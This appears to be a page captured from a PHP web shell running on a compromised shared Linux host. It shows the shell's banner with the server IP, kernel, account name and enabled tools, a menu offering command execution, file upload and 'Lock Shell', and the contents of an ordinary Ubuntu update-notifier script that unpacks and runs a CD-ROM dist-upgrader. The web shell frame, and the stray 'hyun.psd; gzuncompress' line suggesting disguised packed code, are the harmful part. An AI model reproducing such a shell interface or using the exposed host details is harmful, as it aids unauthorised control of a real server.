hyun.psd; gzuncompress
|
Server IP : 173.236.192.202 / Your IP : 216.73.216.85 Web Server : Apache System : Linux iad1-shared-e1-03 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64 User : andfor18 ( 14551322) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /lib/update-notifier/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
|---|
#!/bin/sh
#
CDROM_MOUNT="$1"
for d in "$CDROM_MOUNT"/dists/*/main/dist-upgrader/binary-all/; do
if [ -d "$d" ]; then
UPGRADER_DIR="$d"
break
fi
done
TAR=$(basename "$UPGRADER_DIR"/*.tar.gz)
CODENAME=${TAR%.tar.gz}
# get a tempdir
TMPDIR=$(mktemp -t -d distupgrade.XXXXXX)
cd $TMPDIR
# extract the tar
tar xzf "$UPGRADER_DIR"/"$TAR"
# apply any patches needed before running the upgrade
for apatch in /usr/share/update-notifier/upgrader-patches/*.diff; do
if patch --dry-run < "$apatch"; then
patch < "$apatch"
fi
done
# run it
"$TMPDIR"/"$CODENAME" --cdrom "$CDROM_MOUNT"